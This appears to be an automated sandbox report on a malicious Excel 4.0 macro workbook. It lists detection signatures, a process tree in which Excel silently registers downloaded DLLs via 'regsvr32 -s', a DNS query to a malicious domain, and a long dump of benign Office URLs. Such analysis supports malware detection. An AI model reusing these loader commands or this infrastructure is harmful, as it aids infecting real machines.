Loading ...

Play interactive tourEdit tour

Analysis Report audit-78958169.xlsb

Overview

General Information

Sample Name:audit-78958169.xlsb
Analysis ID:432395
MD5:89b9bbe193a7ba34b8e1d3f619a5ce0e
SHA1:8bb384c33a5afda473e673ad1749ec0479ef7551
SHA256:e96919ae28abab397e13ac2b1a2024cbe0f742c9082d874073c6fe6ba015ad74
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3984 cmdline: regsvr32 -s ..\werty1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6400 cmdline: regsvr32 -s ..\werty2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\werty1.dll, CommandLine: regsvr32 -s ..\werty1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6988, ProcessCommandLine: regsvr32 -s ..\werty1.dll, ProcessId: 3984

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 192.185.48.167:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.113.120:443 -> 192.168.2.4:49735 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\werty2.dllJump to behavior
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: forfacks.com
    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 192.185.48.167:443
    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 192.185.48.167:443
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: fasol[1].htm.0.drString found in binary or memory: <div class="pad"><ul><li class="box9"><a target="_blank" href="http://twitter.com/dreamhimalayan"><img title="Twitter" alt="Twitter" src="https://www.dreamhimalayan.com/pagegallery/5twit.png" /></a></li><li class="box10"><a target="_blank" href="http://facebook.com/dreamhimalayan"><img title="Facebook" alt="Facebook" src="https://www.dreamhimalayan.com/pagegallery/6fb.png" /></a></li><li class="box11"><a target="_blank" href="https://www.linkedin.com/company/dream-heaven-adventure-pvt-ltd-/"><img title="Linkedin" alt="Linkedin" src="https://www.dreamhimalayan.com/pagegallery/4linkedin.jpg" /></a></li><li class="box12"><a target="_blank" href="https://www.instagram.com/dreamhimalayan/"><img title="Instagram" alt="Instagram" src="https://www.dreamhimalayan.com/pagegallery/8ins.jpg" /></a></li><li class="box13"><a target="_blank" href="http://www.tripadvisor.com/Attraction_Review-g293890-d6894456-Reviews-Dream_Heaven_Adventure_Day_Tours-Kathmandu_Kathmandu_Valley_Bagmati_Zone_Central_.html"><img title="TripAdvisor" alt="TripAdvisor" src="https://www.dreamhimalayan.com/pagegallery/90tripadvisor.jpg" /></a></li></ul></div> </div> equals www.facebook.com (Facebook)
    Source: fasol[1].htm.0.drString found in binary or memory: <div class="pad"><ul><li class="box9"><a target="_blank" href="http://twitter.com/dreamhimalayan"><img title="Twitter" alt="Twitter" src="https://www.dreamhimalayan.com/pagegallery/5twit.png" /></a></li><li class="box10"><a target="_blank" href="http://facebook.com/dreamhimalayan"><img title="Facebook" alt="Facebook" src="https://www.dreamhimalayan.com/pagegallery/6fb.png" /></a></li><li class="box11"><a target="_blank" href="https://www.linkedin.com/company/dream-heaven-adventure-pvt-ltd-/"><img title="Linkedin" alt="Linkedin" src="https://www.dreamhimalayan.com/pagegallery/4linkedin.jpg" /></a></li><li class="box12"><a target="_blank" href="https://www.instagram.com/dreamhimalayan/"><img title="Instagram" alt="Instagram" src="https://www.dreamhimalayan.com/pagegallery/8ins.jpg" /></a></li><li class="box13"><a target="_blank" href="http://www.tripadvisor.com/Attraction_Review-g293890-d6894456-Reviews-Dream_Heaven_Adventure_Day_Tours-Kathmandu_Kathmandu_Valley_Bagmati_Zone_Central_.html"><img title="TripAdvisor" alt="TripAdvisor" src="https://www.dreamhimalayan.com/pagegallery/90tripadvisor.jpg" /></a></li></ul></div> </div> equals www.linkedin.com (Linkedin)
    Source: fasol[1].htm.0.drString found in binary or memory: <div class="pad"><ul><li class="box9"><a target="_blank" href="http://twitter.com/dreamhimalayan"><img title="Twitter" alt="Twitter" src="https://www.dreamhimalayan.com/pagegallery/5twit.png" /></a></li><li class="box10"><a target="_blank" href="http://facebook.com/dreamhimalayan"><img title="Facebook" alt="Facebook" src="https://www.dreamhimalayan.com/pagegallery/6fb.png" /></a></li><li class="box11"><a target="_blank" href="https://www.linkedin.com/company/dream-heaven-adventure-pvt-ltd-/"><img title="Linkedin" alt="Linkedin" src="https://www.dreamhimalayan.com/pagegallery/4linkedin.jpg" /></a></li><li class="box12"><a target="_blank" href="https://www.instagram.com/dreamhimalayan/"><img title="Instagram" alt="Instagram" src="https://www.dreamhimalayan.com/pagegallery/8ins.jpg" /></a></li><li class="box13"><a target="_blank" href="http://www.tripadvisor.com/Attraction_Review-g293890-d6894456-Reviews-Dream_Heaven_Adventure_Day_Tours-Kathmandu_Kathmandu_Valley_Bagmati_Zone_Central_.html"><img title="TripAdvisor" alt="TripAdvisor" src="https://www.dreamhimalayan.com/pagegallery/90tripadvisor.jpg" /></a></li></ul></div> </div> equals www.twitter.com (Twitter)
    Source: fasol[1].htm.0.drString found in binary or memory: <link rel="dns-prefetch" href="//www.facebook.com"> equals www.facebook.com (Facebook)
    Source: fasol[1].htm.0.drString found in binary or memory: <link rel="dns-prefetch" href="//www.youtube.com"> equals www.youtube.com (Youtube)
    Source: unknownDNS traffic detected: queries for: forfacks.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: fasol[1].htm.0.drString found in binary or memory: http://trade.welcomenepal.com/useful-contact/trekking-agencies
    Source: fasol[1].htm.0.drString found in binary or memory: http://twitter.com/dreamhimalayan
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: fasol[1].htm.0.drString found in binary or memory: http://www.dreamhimalayan.com/
    Source: fasol[1].htm.0.drString found in binary or memory: http://www.dreamhimalayan.com/team.html
    Source: fasol[1].htm.0.drString found in binary or memory: http://www.dreamhimalayan.com/terms-and-conditions.html
    Source: fasol[1].htm.0.drString found in binary or memory: http://www.taan.org.np/members/dream-heaven-adventure-pvtltd-253
    Source: fasol[1].htm.0.drString found in binary or memory: http://xenatechnepal.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.cortana.ai
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.office.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.onedrive.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://augloop.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cdn.entity.
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cortana.ai
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cortana.ai/api
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://cr.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://directory.services.
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: fasol[1].htm.0.drString found in binary or memory: https://embed.tawk.to/5b1e29123604f81d726bebcb/default
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://graph.windows.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://graph.windows.net/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://login.windows.local
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://management.azure.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://management.azure.com/
    Source: fasol[1].htm.0.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
    Source: fasol[1].htm.0.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js
    Source: fasol[1].htm.0.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://messaging.office.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://officeapps.live.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://onedrive.live.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://outlook.office.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://settings.outlook.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://tasks.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: fasol[1].htm.0.drString found in binary or memory: https://thetravelista.net/2018/04/25/2-week-nepal-itinerary/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://wus2.contentsync.
